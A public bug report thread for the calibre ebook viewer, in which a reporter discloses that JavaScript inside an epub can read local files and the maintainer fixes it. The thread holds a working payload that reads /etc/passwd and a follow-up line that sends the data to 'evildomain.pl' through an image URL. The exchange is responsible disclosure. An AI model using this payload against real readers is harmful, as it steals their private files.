calibre

Local file access trought javascript in epub View

Bug #1651728 reported by Jędrzej on 2016-12-21

256

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	calibre	Fix Released	Undecided	Unassigned

Bug Description

Hello,

Calibre can access the local files using javascript in epub file.

Code snippet:
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script>
    $.getScript( "../../../../../../../../etc/passwd", function( data, textStatus, jqxhr ) {
        document.write('<h1>Your data</h1><pre>' + data + '</pre>');
    });
</script>

Attacker can steal any victim file and send to server.

Tested on: Mac, i think it will work on any OS
Version: 2.74.0

Tags:

Revision history for this message

Jędrzej (yendrzei) wrote on 2016-12-21:

Kazdy dostanie swoja koze - Robert M. Wegner.epub Edit (889.8 KiB, application/octet-stream)

Crafted epub file.

Payload on page 3

tags:

added: security

Revision history for this message

Kovid Goyal (kovid) wrote on 2016-12-21: Re: calibre bug 1651728

This comes from the default security policy of Qt WebKit, which calibre
uses. While it is true that the javascript can be used to read any file
on the computer, the attacker cannot do anything with the data, since
connecting to remote urls is disabled. See the
LocalContentCanAccessRemoteUrls setting in https://doc.qt.io/qt-4.8/qwebsettings.html#WebAttribute-enum

Nonetheless, to be doubly secure, I will also turn off LocalContentCanAccessFileUrls
since as far as I can tell, it is not needed for the operation of the viewer.

Also, note that the viewer is in the process of being replaced with a
completely new implementation that only runs the ebook content in a
sandboxed iframe (you can see the new viewer implementation in action by
running it in your web browser via calibre-debug --new-server)

Revision history for this message

Kovid Goyal (kovid) wrote on 2016-12-21: Fixed in master

Fixed in branch master. The fix will be in the next release. calibre is usually released every Friday.

status fixreleased

Changed in calibre:
status:	New → Fix Released

Revision history for this message

Jędrzej (yendrzei) wrote on 2016-12-21:

Hi,

i think it's not true that attacker cannot do anything with data. When I put img tag:
<img src="http://remote_addres/some.jpg"> Calibre will render this.

When attacker change document.write in payload to this:
document.write('<img src="http://evildomain.pl/some.jpg?data=' + btoa(data) + '">');
could easily read data from server log.

Thank you for very fast fix :).

Revision history for this message

Kovid Goyal (kovid) wrote on 2016-12-21: Re: calibre bug 1651728

You're welcome and thanks for the bug report :)

Kovid Goyal (kovid) on 2017-01-29

information type:

Private Security → Public Security